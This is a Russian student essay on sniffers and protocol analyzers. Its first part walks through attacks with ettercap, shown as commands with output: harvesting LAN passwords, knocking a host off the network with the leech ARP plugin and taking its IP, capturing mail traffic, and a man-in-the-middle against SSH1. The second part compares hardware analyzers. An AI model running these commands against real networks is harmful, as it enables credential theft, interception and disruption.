Реферат: Определение подозрительных пакетов, анализ протоколов сети - текст реферата. Скачать бесплатно.
Банк рефератов, курсовых и дипломных работ. Много и бесплатно. # | Правила оформления работ | Добавить в избранное
 
 
   
Меню Меню Меню Меню Меню
   
Napishem.com Napishem.com Napishem.com

Реферат

Определение подозрительных пакетов, анализ протоколов сети

Банк рефератов / Компьютерные сети

Рубрики  Рубрики реферат банка

закрыть
Категория: Реферат
Язык реферата: Русский
Дата добавления:   
 
Скачать
Архив Zip, 442 kb, скачать бесплатно
Заказать
Узнать стоимость написания уникального реферата

Узнайте стоимость написания уникальной работы

17 Министерство Высшего и Среднего Специального Образования Республики Узбекистан Ташкентский Государственный Технический Университет Факультет : «Компьютерные технологии» Кафедра : «Компьютерные системы и сети» РЕФЕРАТ На тему : « Определение подозрительных пакетов , анализ протоколов сети » Выполнил : маг . гр . 51М -02ИБ Д . Бобокулов Принял : доц . Каримов М.М. Ташкент -2002-03 Содержание : 1. Введение. 2. 2. Программные средства анализа подозрительных пакетов на примере ОС Linux . 3. 3. Аппаратные средства анализа пакетов (протоколов ). Анализаторы. 8. 4. Критерии выбора анализатора пакетов. 11. 5. Заключение. 16. 6. Список использованных источнико в. 17. Введение. В настоящее время аппаратная архитектура Ethernet завоевала большую часть рынка при создании локальных сетей , хотя существуют и другие аппаратные решения не на IEEE 802.3, такие как FDDI, Token Ring (802.5), ARCNET, WAN, ATM и др угие . Относительная недороговизна в сочетании с технической скоростью передачи данных в 10, 100 и 1000 мегабит в секунду способствует ее популярности . Сеть Ethernet работает как магистраль , через которую любой узел может пересылать пакеты на другой узел , п одключенный к тому же сегменту сети . Для перенаправления пакетов из одной сети в другую необходимо пользоваться репитером , свитчем или концентратором . Процесс передачи фреймов обеспечивает межсетевой протокол , который не зависит от оборудования и представ л яет различные сети в одну сеть . Но при использовании этого протокола нет гарантий , что пакет достигнет адресата , но решение этой задачи обеспечивает протокол TCP/IP, занимающийся гарантированной доставкой пакетов . TCP не единственный протокол в стеке прот о колов TCP/IP, существует еще протокол UDP, который много быстрее протокола TCP, так как не создает и не закрывает сеанс соединения , а узел с помощью его просто отправляет данные в дейтаграммах другим узлам в сети . Пакет , отправленный в широковещательной с е ти одним из узлов , принимается всеми находящимися в этом сегменте сети машинами , но только узел назначения , указанный в заголовке пакета , "смотрит " на него и начинает его обработку (относится и к TCP и к UDP протоколам ). Перехватчики сетевых пакетов могут не только использоваться администратором сети для проверки и детального анализа правильности конфигурации сетевого программного обеспечения , но и представляют собой серьезную угрозу , поскольку могут перехватывать и расшифровывать имена и пароли пользоват е лей , конфиденциальную информацию , нарушать работу отдельных компьютеров и сети в целом. Анализаторы пакетов относятся к классу инструментальных программных средств для мониторинга сетевого трафика и выявления некоторых типов сетевых проблем . По умолчанию с етевой интерфейс видит пакеты , предназначенные только для него . Однако анализаторы устанавливают его в режим приема всех пакетов - promiscuous mode, прослушивают сеть и заставляют сетевой интерфейс принимать все фреймы , вне зависимости от того , кому они а д ресованы в сети. Программные средства анализа подозрительных пакетов на примере ОС Linux . Для установки "вручную " сетевого интерфейса в неразборчивый режим необходимо включить флаг PROMISC: ifconfig eth0 promisc; для отключения promiscuous mode: if config eth0 -promisc . Ярким примером инструментального программного средства служит программа tcpdump , написанная Вэном Якобсоном и поставляющаяся сейчас со многими дистрибутивами . Пример использования tcpdump: tcpdump -i eth0 -n -vv -w /root/tcpdump.log где : -I - сетевой интерфейс ; -n - делаем числовой вывод адресов и номеров портов ; -vv - очень подробный вывод ; -w - запись лога в файл. Чтобы прочитать перехваченный трафик из лога (выводим не на консо л ь , а в файл ): tcpdump -r /root/tcpdump.log > /root/tcpdump0.log Фрагмент работы tcpdump: 14:06:28.250082 B 192.168.5.17.1445 > 255.255.255.255.8167: udp 21 14:07:24.126187 > midian > 192.168.5.23: icmp: echo request 14:07:24.126667 < 192.168.5.23 > midia n: icmp: echo reply Первая строка показывает , что 192.168.5.17 пользуется программой для общения в локальной сети (делает широковещательный запрос , используется порт 8167), вторая и третья указывают , что хост midian проверяет машину с IP-адресом 192.168.5. 23 программой ping. Анализаторы пакетов , несомненно , полезны для решения администратором сети известных и неизвестных проблем , но существует и обратная сторона медали : неразборчивый режим приема пакетов позволяет злоумышленнику получать весь трафик в сет и и фильтровать его на наличие имен , паролей пользователей , незашифрованных писем и т.д . Теперь все только ограничивается фантазией хакера . Ettercap Особенности этого сниффера : · работает на Linux 2.0.x, Linux 2.2.x, Linux 2.4.x, FreeBSD 4.x, OpenBSD 2. [789], NetBSD 1.5.x, Mac OS (darwin 1.3); · перехват и расшифровка паролей TELNET, SSH1, FTP, POP, LOGIN, ICQ, SMB, MySQL, HTTP, HTTPS, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC; · возможнось вставки символов в установленное соединение - бу дет происходить эмуляция команд сервера и ответов клиента (работает только в интерактивном режиме ); · нетребовательность к библиотекам libpcap, libnet, libnids в отличии от других снифферов ; · поддержка плагинов ; возможность написания собственных плагино в ; · текстовый и псевдографический (основанный на ncurses) интерфейсы ; · различные виды прослушивания ; возможность использования фильтров ; · работа в сети с активными интеллектуальными хабами . Установка сниффера : ./configure make make install Установка плагинов : make plug-ins make plug-ins_install Некоторые опции сниффера : -a, -s, -m - различные виды прослушивания ; -N - запускать сниффер без псевдографики ; -z - запуск в спокойном режиме ; -d - не преобразовывать IP-адреса в имена ; -i - сетевой интерфейс ; -l - вывести список хостов в сети ; -C - собирать все имена и пароли пользователей ; -f - определение операционной системы удаленного хоста ; -p - работа с плагинами ; -L - записывать в лог , имеющий формат : год :месяц :день -collected-pass.log Рассмотрим некотор ые виды использования этого сниффера . Перехватываем все имена пользователей и пароли в нашем сегменте сети и записываем в лог : ettercap -NdzsCLi eth0 После недолгого ожидания получаем необходимое ;) 14:43:45 192.168.5.29:1755 <--> 212.48.140.154:80 www US E R: leshii PASS: softerra http://www.nm.ru/gateway_chat.shtml Определяем операционную систему хоста , например , с IP-адресом 192.168.5.24: ettercap - Ndzsfi eth0 192.168.5.24 Смотрим установленные у нас плагины и описания к ним : ettercap - N -p list Для акт и вации плагина (например , пропингуем какой-нибудь хост ): ettercap - N -p ooze 192.168.5.33 Самый интересным плагином является leech. Он изолирует удаленный хост от сети . Пример работы этого плагина : Сначала проверим , "жив " ли хост : andrushock# ping -v -c 4 192.168.5.23 PING 192.168.5.23 (192.168.5.23): 56 data bytes 64 bytes from 192.168.5.23: icmp_seq=0 ttl=128 time=0.945 ms 64 bytes from 192.168.5.23: icmp_seq=1 ttl=128 time=0.562 ms 64 bytes from 192.168.5.23: icmp_seq=2 ttl=128 time=0.524 ms 64 bytes fr o m 192.168.5.23: icmp_seq=3 ttl=128 time=0.520 ms Запускаем плагин (операционная система хоста жертвы - win98se): andrushock# ettercap -Ndp leech 192.168.5.23 Наблюдаем за процессом работы : Your IP: 192.168.5.21 MAC: 00:50:BF:4A:48:F3 Iface: ed0 Starting ./ ec_leech.so plugin... Building host list for netmask 255.255.255.0, please wait... Sending 255 ARP request... Listening for replies... Isolating host 192.168.5.23...Press return to stop Ждем пару минут и смело нажимаем ^C, затем проверяем работу плагина : andrushock# ping -v -c 4 192.168.5.23 PING 192.168.5.23 (192.168.5.23): 56 data bytes ---192.168.5.23 ping statistics--- 4 packets transmitted, 0 packet received, 100% packet loss andrushock# Сетевой интерфейс на машине жертвы на некоторое время перестает работать , хотя операционная система и запущенные приложения функционируют в том же нормальном режиме . Но этого "некоторого " времени хватает , например , для того , чтобы заполучить себе IP-адрес жертвы : ifconfig eth0 down ifconfig eth0 inet 192.168.5.23 ifco n fig eth0 up И набираем команду , чтобы удостовериться о нашем "новом " IP-адресе : ifconfig eth0 Перехват незашифрованных почтовых сообщений . Вид записи : ./ettercap -Nzds : Пример перех вата исходящих писем : ./ettercap -Nzds ANY:25 ANY > /root/sniff.smtp И смотрим через некоторое время , что попалось в наши сети (привожу часть лога ): с at /root/sniff.smtp Your IP: 192.168.5.21 with MAC: 00:50:BF:4A:48:F3 on Iface: eth0 Press 'h' for help... Sniffing (IP based): ANY:0 <--> ANY:25 18:19:14 192.168.5.23:1030 --> 80.68.244.5:25 18:19:14 80.68.244.5:25 --> 192.168.5.23:1030 Далее идет процесс аутентификации , письмо от кого , адрес реципиента , их валидность и сам текст письма. To: andrushock@fromru .com. Subject: test. Mime-Version: 1.0. Content-Type: text/plain; charset=us-ascii. Content-Transfer-Encoding: 7bit. . Hello andrushock,. . Test for Softerra. . -- . Best regards,. Noname mailto: ******@pisem.net. Далее сообщение демона о принятии письма к отправке и завершение почтовым сервером соединения . Для перехвата входящих в локальную сеть электронных писем используем : ./ettercap -Nzds ANY:110 ANY > /root/sniff.pop3 или ./ettercap -Nzds ANY:143 ANY > /root/sniff.imap4 Пример перехвата паролей во вре мя сессии SSH: На одной машине 192.168.5.21 стоит ettercap (назовем злоумышленник ), на втором 192.168.5.4 sshd (назовем сервер ), а на третьем 192.168.5.22 SecureCRT (назовем клиент ). ./ettercap -Ndl - выводим список всех ip с МАС-адресами машин в сегменте локальной сети , запоминаем только МАС-адреса сервера и клиента . Запускаем сниффер на прослушивание и ждем когда клиент инициализирует сеанс Secure Shell с сервером и начнется процесс аутентификации . В этом случае машина злоумышленника является "мостом ", ч е рез который будет проходить и расшифровываться на лету весь проходящий траффик между клиентом и сервером. Вид записи : ./ettercap -za ./ettercap -za 192.168.5.4 192.168.5.22 00:50 :BF:03:BC:47 00:A0:24:93:61:3D Привожу "текстовый скриншот " ettercap 0.5.4 SOURCE: 192.168.5.22 ? Filter: OFF doppleganger - illithid (ARP Based) - ettercap DEST: 192.168.5.4 ? Active Dissector: ON ??? hosts in this LAN (192.168.5.21 : 255.255.255.0) 1) 192.168.5.22:1252 ?? 192.168.5.4:22 | silent | SSH decrypt Your IP: 192.168.5.21 MAC: 00:50:BF:4A:48:F3 Iface: ed0 Link: not tested USER: testuser PASS: softerra В левом нижнем углу лицезреем уже расшифрованные имя пользователя и его пароль . Примечание : с етевой интерфейс действительно ed0, так как программа тестировалась в операционных системах Linux и FreeBSD. Постоянно выходят новые версии Ettercap, в которых исправляются ошибки (например , только несколько версий назад исправили "глюк ", когда после рабо ты сетевой интерфейс , на котором был запущен этот сниффер падал ), добавляются новые возможности и переносы на другие операционные системы , в отличие от программ описанных ниже , работа над которыми уже давно не ведется , хотя в настоящее время эти анализато р ы протоколов являются самыми популярными. sniffit Возможности этого сниффера : · работает на LINUX, SunOS/Solaris, Irix, FreeBSD, BSDi, DEC/OSF, NetBSD; · перехват паролей FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Micros oft SMB, Oracle SQL*Net, Sybase and Microsoft SQL; · использование конфигурационных файлов для создания фильтров ; · имеет текстовый и псевдографический (основанный на ncurses) интерфейсы . dsniff Примечание : эту версию сниффера я не смог поставить на Red Hat Linux 7.0, поэтому пришлось качать более новую , но beta, где как раз исправл ена ошибка компоновки для дистрибутивов Red Hat Linux 6,7. Возможности этого сниффера : работает на OpenBSD ( i 386), Redhat Linux ( i 386), Solaris ( sparc ), FreeBSD , Debian Linux , Slackware Linux , AIX , HP - UX ; · перехват паролей FTP , Telnet , SMTP , HTTP , POP , poppass , NNTP , IMAP , SNMP , LDAP , Rlogin , RIP , OSPF , PPTP , MS - CHAP , NFS , VRRP , YP / NIS , SOCKS , X 11, CVS , IRC , AIM , ICQ , Napster , PostgreSQL , Meeting Maker , Citrix ICA , Symantec pcAnywhere , NAI , Sniffer , Microsoft SMB , Oracle SQL * Net , Sybase , Microsoft SQL ; · также в этот пакет входит набор "утилит " для перехвата сообщений AOL Instant Messenger, ICQ 2000, IRC, Yahoo Messenger chat, прослушивания ssh траффика , флуда локальной сети случайными MAC-адресами , ограничения пропускной способности соединения , обрыва заданного TCP-соединения и др .; · не имеет псевдографического интерфейса. Аппаратные средства анализа пакетов (протоколов ). Анализаторы протоколов передачи данных . Сегодня оборудование передачи данных можно найти практически в любом офисе и на каждом пром ышленном предприятии . В офисе это различные периферийные устройства для персональных компьютеров и оборудование передачи данных по корпоративным или территориальным сетям , на производстве — системы сбора информации и управления . Разнообразие устройств , об м енивающихся данными , растет с каждым днем , однако набор используемых при этом интерфейсов не претерпел существенных изменений . К тому же с течением времени отрасль выработала множество приспособлений и инструментов для тестирования интерфейсов на различно м уровне и диагностики проблем взаимодействия устройств . Один из самых старых интерфейсов , RS-232, имеет огромное число разновидностей . Несмотря на то что любой специалист по вычислительной технике или микроконтроллерам знает его цоколевку наизусть , тем не менее проблемы могут возникнуть уже на этапе подключения устройств друг к другу . Особенно часто это бывает вызвано отсутствием информации о том , какие управляющие сигналы используются , к какому типу относятся устройства (DTE/DCE), каковы скорость и форма т передачи данных . Комплект простейших устройств , который будет описан ниже , существенно облегчает работу тем , кому приходится иметь дело с этим интерфейсом. Для того чтобы изготовить переходник , совсем не обязательно пользоваться паяльником — достаточно простого приспособления , с помощью которого контакты одного разъема можно было бы соединить с контактам и другого в нужной последовательности обычным проводом без пайки . Такой мини-кросс позволяет не только создать устройство с нужной схемой , но и подобрать требуемую схему соединения. Чтобы понять , почему же обмен не происходит , совсем не обязательно искать анализатор — для диагностики достаточно простого индикатора , если он позволяет провести мониторинг осн овных сигналов . Его двухцветные светодиоды могут идентифицировать высокий /низкий уровень сигнала , его отсутствие и линии , по которым ведется передача данных. Иногда функции мини-кросса и индикатора объединяются . Однако рынок предлагает и более универсальны е приборы (их английское название — breakout box, специального русского термина пока нет , поэтому мы будем называть их просто тестерами ). Изобилие разновидностей этого вида приборов поражает . Помимо кроссировки и индикации состояния линий они позволяют от к лючать или подключать отдельные линии в процессе отладки , подавать на них сигналы определенного уров ня , фиксировать наличие на линиях коротких импульсов . Появившиеся во времена расцвета интерфейса RS-232/V.24, такие приборы стали настолько популярны , что сегодня производителями выпускается широкая гамма моделей для последовательных синхронных и асинхрон н ых (RS-422/423, RS-449/V.36, X.21, V.35), а также параллельного (Centronics) интерфейсов. Большинство моделей снабжено встроенным тестером кабелей для проверки или определения электрической схемы . Некоторые модели имеют встроенный мультиметр. Следующими по уровню сложности являются устройства , выполняющие функции тестера частоты ошибочных битов /блоков (bi t/block error rate, BER/BLER ). Они позволяют измерить параметры , используемые для оценки качества канала и его диагностики (количество полученных блоков ; долю битов /блоков , содержащих ошибки ; сумму секунд , когда наблюдались ошибки ; число случаев потерь с и нхронизации ; сумму секунд , когда имели место сбои синхронизации ; количество ошибок четности и фрейминга , а также время выполнения теста и частоту появления ошибок в битах /блоках ). Хорошие приборы имеют встроенный генератор тестовых последовательностей для синтеза определенных наборов символов (наиболее часто используются последовательности « quick brown fox» и « barber poles» ) или передачи задаваемого пользователем набора символов . Некоторые приборы имеют опции для тестирования статистических мультиплексоров (опрос устройств и управление потоком Xon/Xoff), мониторинга каналов SDLC, работы с пр о токолами SNA и X.25 и т . п. Особое место занимают устройства регистрации , так называемые логгеры , для фиксации и записи данных в реальном масштабе времени . Сохраненные в их внутреннем буфере данные можно просмотреть на дисплее логгера или распечатать с пре образованием в нужную кодовую таблицу (например , ASCII). Большинство логгеров реализует и все описанн ые выше функции . Самые мощные логгеры имеют алфавитно-цифровой дисплей и полноразмерную клавиатуру для редактирования и моделирования сообщений . Подготовленные таким образом сообщения могут использоваться при отладке различных устройств. Особняком стоят бо лее мощные (и существенно более дорогие ) приборы для анализа протоколов передачи данных по глобальным сетям (WAN). Вообще в современном мире , после перехода телефонии на цифровые принципы , граница между данными цифровых телефонных систем и данными вычисли т ельных сетей становится все более расплывчатой . В случае PDH/SDH на канальном уровне отличия между ни ми вообще не существуют . Они появляются на более высоком уровне , где используются специфические протоколы . Поскольку все анализаторы выполнены на базе обычных компьютеров (как правило , это ноутбуки с набором дополнительных интерфейсных карт ), то почти все г да можно найти несколько однотипных моделей , отличающихся конкретным набором протоколов и ценой . Некоторые производители идут по пути создания сверхуниверсальных приборов , которые могут использоваться как в телефонии , так и при передаче данных . Другие пре д лагают узкоспециализированные приборы , но за меньшую цену. Большинство современных приборов этого тип а позволяет анализировать сразу несколько протоколов глобальных сетей , таких , как X.25, PPP, SLIP, SDLC/SNA, frame relay, SMDS, ISDN, протоколы мостов /маршрутизаторов (3Com, Cisco, Bay Networks и другие ). Такие анализаторы позволяют измерять различные пар а метры протоколов , анализировать трафик в сети , преобразование между протоколами локальных и глобальных сетей , задержку на маршрутизаторах при этих преобразованиях и т . п . Более совершенные приборы предусматривают возможность моделирования и декодирования п ротоколов глобальных сетей , «стрессового» тестирования , измерения максимальной пропускной способности , тестирования качества предоставляемых услуг . Стоит отметить и тот факт , что в целях универсальности почти все анализаторы протоколов глобальных сетей ре а лизуют функции тестирования ЛВС и всех основных интерфейсов . Некоторые приборы способны осуществлять анализ протоколов телефонии . А самые современные модели могут декодировать и представлять в удобном варианте все семь уровней OSI. Появление ATM привело к тому , что производители стали снабжать свои анализаторы средствами тестирования этих сетей . Такие приборы могут проводить полное тестирование сетей АТМ уровня E-1/E-3 с поддержкой мониторинга и моделирования . Очень важное значение имеет набор сервисных фу н кций анализатора . Некоторые из них , например возможность удаленного управления прибором , просто незаменимы . Таким образом , современные анализаторы протоколов WAN/LAN/ATM позволяют обнаружить ошибки в конфигурации маршрутизаторов и мостов ; установить тип трафика , пересылаемого по глобальной сети ; определить используемый диапазон скоростей , оптимизировать соотношение между пропускной способностью и количеством каналов ; локализовать источник неправильного трафика ; выполнить тестирование последовательных интерфейсов и полное тестирование АТМ ; осуществить полный мониторинг и декодирование основных протоколов п о любому каналу ; анализировать статистику в реальном времени , включая анализ трафика локальных сетей через глобальные сети. Критерии , по которым следует выбирать анализатор протоколов Любой сетевой администратор , который однажды столкнулся с задачей трансф ормации сети , скажет , что новые технологии привносят не меньше новых проблем , нежели решают . Анализатор протоколов позволяет выявлять и устранять проблемы существующей сети , а также упростить процесс перехода к новой технологии . Благодаря анализатору можн о не только оперативно устранять проблемы по мере их возникновения , но и предупреждать их появление. Анализаторы протоколов - это "горячий " продукт , который , естественно , достаточно широко представлен на рынке телекоммуникаций . Кроме того , это довольно доро гое устройство . Как выбрать наиболее подходящий ? Необходим системный подход . Выделяют ряд критериев , по которым оценивают анализаторы протоколов : · Возможность декодирования сетевых протоколов и поддержки сменных интерфейсов . · Качество интерфейса програм много обеспечения . · Наличие многоканальности . · Возможность интеграции с PC. · Размер и вес . · Соотношение цены и предоставляемых услуг . Рассмотрим представленные на рынке телекоммуникаций анализаторы протоколов и оценим их с точки зрения этих критер иев . Проведенные автором исследования рынка показали , что наибольшее распространение на российском рынке анализаторов получили модели Domino и DA-30 фирмы Wandel&Golterman, J2300A фирмы Hewlett-Packard, Fireberd 300 и Fireberd 500 фирмы TTC (Telecommunica t ion Technic Corporation), Sniffer компании Network General и серия продуктов компании RADCOM(RC-88WL, RC-100WL). Поддерживаемые протоколы и физические интерфейсы Поддерживаемые протоколы и возможность физического подсоединения к различным физи ческим интерфейсам определяют сферу и широту применения анализтора . Физические интерфейсы В число традиционно поддерживаемых физических интерфейсов входят V.35, RS-232/V.24, RS-449, RS-530, X.21/V.11, которые обычно включаются в базовый компле кт поставки анализатора . Интерфейсы Е 1, Т 1, Ethernet, Token Ring являются дополнительными и обычно не входят в базовый комплект . Благодаря модульной структуре конструкции анализатора , всегда остается возможность его оснащения требуемыми физическими интерф е йсами . Отсутствие поддержки каких-либо из этих интерфейсов или неоправданно высокая стоимость , может оказаться слабой стороной анализатора . Модель Domino фирмы Wandel&Golterman не поддерживает интерфейс Т 1, что для российских условий не является существен н ым , однако , отсутствие поддержки интерфейса Е 1 моделями Fireberd 300, Fireberd 500 фирмы TTC может стать серьезным ограничением для их использования. Протоколы В международной классификации сетевые протоколы подразделяются на классы , или серии, которые содержат протоколы с общими признаками . Анализ сетевых протоколов - центральная задача анализатора , поэтому естественным требованием системного администратора является поддержка максимального количества протоколов . На практике же оказывается , что возможность работы ряда анализаторов с частью протоколов из класса не всегда подразумевает поддержку целого класса. Наибольшей полнотой возможностей работы с сетевыми протоколами отличаются модели J2300А компании Hewlett-Packard, RC-88WL и RC-100WL фирмы R ADCOM. На сегодняшний день они поддерживают декодирование около 140 сетевых протоколов , что является практически полным списком используемых протоколов . Например , протокол Apollo Domain поддерживает только модель J2300A Hewlett Packard, а протокол RND - т о лько указанные модели фирмы RADCOM. Список протоколов , поддерживаемых другими анализаторами , не так обширен . Модели Domino, DA-30 компании Wandel&Golterman не поддерживают такие протоколы серии TCP/IP, как TELNET, FTP, TFTP, и отдельные протоколы других гр упп. Интерфейс программного обеспечения Почему интерфейс программного обеспечения является таким важным фактором ? Чем "дружественнее " оболочка программного обеспечения , тем эффективнее работа администратора , кроме того , графический оконный инте рфейс способствует быстрому освоению программного обеспечения и позволяет адекватно воспринимать выдаваемую анализатором информацию . В результате широкого распространения среды MS-Windows графический оконный интерфейс стал некоторым стандартом для компьют е рных приложений . Однако каждая фирма-производитель анализаторов протоколов использует свой собственный подход к организации программного интерфейса. Компания RADCOM изначально ориентировалась на графический оконный интерфейс (выход первых моделей анализато ров в 1991г . совпал с моментом признания MS-Windows). Естественно , что с устранением системных ошибок в среде MS-Windows устранялись ошибки и в программном обеспечении анализатора . Сейчас программное обеспечение RADCOM стало высоконадежным и зрелым продук т ом . Для анализаторов Domino и DA-30 фирмы Wandel&Golterman графический оконный интерфейс является достаточно новым (используется в них , начиная с июня 1995 г .) и не всегда удобен для работы . Анализаторы протоколов Sniffer компании Network General и J2300A компании Hewlett-Packard предлагают два различных типа программного обеспечения : графический оконный интерфейс - для работы с локальными сетями , интерфейс под операционную среду MS-DOS - для работы с распределенными сетями . Последний тип ПО никак не може т считаться передовым , поскольку усложняет работу оператора и накладывает дополнительные ограничения на свое использование. Многоканальность Наличие или отсутствие функции одновременной работы с несколькими каналами очень часто является определя ющим при классификации анализатора . Как известно , в классе протокольных анализаторов выделяют подкласс с более богатыми функциональными и исследовательскими возможностями (Research and Development, или R&D Analyzers). В качественных моделях анализаторов п о ддержка работы с несколькими каналами обычно подразумевает наличие дополнительной функции имитации . Эта функция в совокупности с многоканальностью позволяет использовать анализатор одновременно в качестве генератора проверочных последовательностей и тести р ующего оборудования . Следует отметить , что далеко не все анализаторы , представленные на рынке ( а их более десятка ! ), поддерживают многоканальность . Анализаторы компаний RADCOM и Wandel&Golterman в полной мере поддерживают эту функцию . Например , RADCOM п редлагает очень практичное решение : наличие поддержки одновременной работы с двумя физическими каналами в совокупности с принципом модульности физических интерфейсов позволяют получить практически любую требуемую конфигурацию . Кроме наиболее часто исполь з уемой конфигурации - интерфейс локальной сети плюс интерфейс распределенной - можно использовать интерфейсы двух локальных или двух распределенных сетей . Модель Fireberd 300 фирмы TTC позволяет одновременно работать c каналами распределенных и локальных с етей , но не более чем с одним видом в определенный промежуток времени . Этот анализатор не может одновременно тестировать два различных сегмента локальной сети или два канала связи распределенной сети . Сетевые администраторы лишаются очень важной и естеств е нной возможности - анализировать трафик смежных сегментов сети , а при необходимости - генерировать проверочные последовательности на одном сегменте сети и проверять их на соседнем средствами одного устройства . Модели Sniffer компании Network General и J230 0A компании Hewlett-Packard не поддерживают одновременную работу с несколькими каналами . На момент написания статьи компания Hewlett-Packard объявила , что поддержка функции многоканальности должна быть реализована ею в ближайшее время . Однако стоит учитыв а ть тот факт , что не всегда новые продукты отвечают требованиям , исходя из которых они создавались , и может пройти некоторое время , прежде чем будут устранены их недостатки и проведены доработки. Интеграция с персональным компьютером Составной ч астью любого анализатора протоколов является персональный компьютер (класс тестеров физического уровня выходит за рамки рассмотрения данной статьи ). Известны два принципиальных подхода к организации взаимодействия между анализатором протоколов и ПК . Первы й состоит в интеграции анализатора и компьютера на базе единого устройства , второй , более современный , - в их совместном использовании , как независимых составляющих . В последнем случае удается строго разделить функции , выполняемые каждым устройством . Такой подход позволяет осуществлять независимую модернизацию составляющих и является особенно актуальным при существующем развитии компьютерных технологий. Анализаторы могут быть аппаратно реализованы как внутренняя плата для персонального компьютера и как отдел ьное устройство . Крупный недостаток анализаторов , реализованных в виде внутренней платы , может проявиться при желании переставить его в ПК с другой шиной . Для анализаторов Sniffer даже существуют подразделения на Type I, Type II, Type III, которые предназ н ачены для шин ISA, EISA и т.д . Еще одним ограничением , которое связано с таким подходом , является требование двух свободных слотов , что особенно критично для компьютеров типа Notebook. Более распространенным подходом является реализация анализатора проток о лов в виде отдельного устройства . Из этого направления , в свою очередь , можно выделить случаи интеграции функций анализатора и персонального компьютера . В анализаторе DA-30 фирмы Wandel&Golterman используется встроенный PC 386/16Mhz, а в модели Fireberd 50 0 фирмы ТТС - PC 486/33Mhz. При существующем развитии компьютерных технологий такой подход может стать серьезным недостатком , поскольку практически исключает возможность увеличения мощности или обновления компьютера. Наиболее жизнеспособным и рентабельным считается подход , обеспечивающий выполнение специальных операций (захвата , декодирования , эмуляции ) с помощью средств независимого устройства , а отображение и обработку результатов сетевого тестирования - средствами отдельного персонального компьютера . Ко м пания RADCOM использует архитектурный подход , в котором функции анализатора протоколов и компьютера строго разделены . Компьютер соединяется с анализатором через параллельный порт и служит для управления и отображения результатов сетевого тестирования . При таком подходе снимаются какие-либо ограничения на используемый компьютер (единственное накладываемое ограничение - требование поддержки MS-Windows). Портативность Размер и вес - это те параметры , которые не являются существенными для "тяжелого " сетевого оборудования , устанавливаемого стационарно , но , наоборот , важны при использовании протокольного анализатора . Проблема может возникнуть в любом сегменте сети , и чем компактнее и легче анализатор , тем удобнее он будет в эксплуатации . Использование параллельной RISC-архитектуры и процессора Intel 960i позволило компании RADCOM добиться высокой производительности при портативности моделей по размеру и весу . При размере 21,6х 27,8х 2,5 см (сопоставимо с размерами книги формата А 4 объемом 100 страниц ) ан а лизатор весит всего 1,5 кг . По данному параметру этот анализатор сопоставим только с моделью Domino, минимальный вес которой составляет 1,3 кг для одноканальной и 2,6 кг для двухканальной модификации . Sniffer сложно охарактеризовать по этому параметру , та к как его весовые характеристики полностью зависят от используемого с ним компьютера . Другие анализаторы протоколов обычно в полтора-два раза больше и весят около 8 кг. Соотношение цены и предоставляемых услуг Этот критерий является определяющим при выборе пратически любого оборудования . Однако было бы правильнее рассматривать соотношение цены и требуемых функций . Такой подход к выбору анализаторов протоколов является более оправданным , поскольку позволяет платить деньги только за жизненно необх о димые функции , имея возможность их расширения по мере возникновения потребностей . Большинство рассматриваемых моделей находятся в одних ценовых рамках , поэтому при выборе анализатора следует обращать внимание прежде всего на схему ценообразования . Наиболе е оправданным является подход минимального базового комплекта аппаратного и программного обеспечения , который может быть дополнен требуемым и физическими интерфейсами и пакетами дешифровки или имитации протоколов . Подводными камнями в этом случае станут т е хнические особенности каждого анализатора . Остановимся на одном показательном примере . Модели Fireberd 500 для работы с локальными сетями требуются разные физические интерфейсы для Token Ring и Ethernet. Таким образом , чтобы получить возможность анализа л ю бой комбинации сегментов (Token Ring /Ethernet, Token Ring/Token Ring или Ethernet/Ethernet), вместо двух требуется четыре физических интерфейса анализатора. Перспективы дальнейшего использования Каждый из представленных на рынке телекоммуникац ий анализаторов протоколов имеет свои преимущества . Анализаторы Fireberd 300 и 500 поддерживают стандарт RMON; J2300A и Sniffer имеют встроенную экспертную систему ; продукты компании RADCOM, а также анализаторы Domino, DA-30 могут независимо работать с ка н алами локальных и распределенных сетей . К недостаткам анализаторов следует отнести отсутствие поддержки того или иного протокола , что весьма существенно для частного случая , но может быть исправлено сравнительно просто - обновлением программного обеспечен и я . Исправление недостатков , связанных с аппаратной базой анализатора , требует замены или доработки самого устройства . Поэтому при выборе анализатора протоколов всегда следует обращать внимание на современность его архитектуры , а также его расширяемость и в озможности применения к развивающимся перспективным технологиям . ЗАКЛЮЧЕНИЕ Для обеспечения защищенности сети , недостаточно только установление аппаратных и программных средств и считать что вы защитились от всего . С каждым днем разрабатываются новы е аппаратные и программные средства . Технологии и программы стареют на глазах . Тем более если в вашей сети установлены WWW , FTP , POP , SMTP сервера которые работают с реальными ip адресами и видны с «мира» при трассировке или при отправке «пингов» зада ча защищенности опять усложняется. Самым ответственным звеном в обеспечении защиты сети являются администраторы сети или как сейчас часто употребляют администратор по безопасности . Администратор должен всегда следить за событиями в сети , смотреть журналы событий , подключений , ошибок а также следить за трафиком . Самыми распространенными и высоко защищенными ОС считаются Unix / Linux системы . А на этих системах приходиться делать все в ручную . Тут нет кнопки на которую можно нажать , нет панели управления где можно все настроить , только команды и пакеты ( RPM ). Облегчают эти кропотливые работы администраторов повышением степени защищенности и удобностью пользования устройства называемые сетевыми анализаторами . Современные анализаторы протоколов WAN/LAN/ATM поз воляют обнаружить ошибки в конфигурации маршрутизаторов и мостов ; установить тип трафика , пересылаемого по глобальной сети ; определить используемый диапазон скоростей , оптимизировать соотношение между пропускной способностью и количеством каналов ; локализ о вать источник неправильного трафика ; выполнить тестирование последовательных интерфейсов и полное тестирование АТМ ; осуществить полный мониторинг и декодирование основных протоколов по любому каналу ; анализировать статистику в реальном времени , включая ан а лиз трафика локальных сетей через глобальные сети. Список источников : 1. http://i2r.rusfund.ru/static/452/out_15653.shtml (Библиотека I 2 R ). 2. http://www.osp.ru/lan/1999/12/008_print.htm ( Игорь Иванцов ) 3. Журнал "LAN", #12, 1999 год // Издательство "Открытые Системы " 4. http://www.opennet.ru 5. Леонтьев Б.К . «Крэкинг без секретов» . М : «Компьютерная литература» , 2001 г.
1Архитектура и строительство
2Астрономия, авиация, космонавтика
 
3Безопасность жизнедеятельности
4Биология
 
5Военная кафедра, гражданская оборона
 
6География, экономическая география
7Геология и геодезия
